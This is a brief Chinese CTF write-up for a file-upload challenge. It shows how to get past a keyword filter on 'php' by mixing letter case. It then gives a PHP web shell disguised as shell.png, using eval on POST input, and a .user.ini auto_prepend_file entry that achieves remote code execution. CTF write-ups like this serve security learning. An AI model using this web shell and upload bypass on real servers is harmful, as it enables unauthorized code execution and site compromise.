目录 思路总结 思路 上传一个包含shell的png文件,发现上传失败 清空文件内容,发现上传成功,可能过滤文件中的关键字,经过尝试,猜测文件对php进行过滤,可以用大小写来绕过 shell.png <?phP echo 123;pHpinfo();eval($_POST['cmd']); ?> 发现其他和上题一样,直接上传.user.ini .user.ini auto_prepend_file=shell.png 然后访问/upload/index.php,直接RCE 总结 …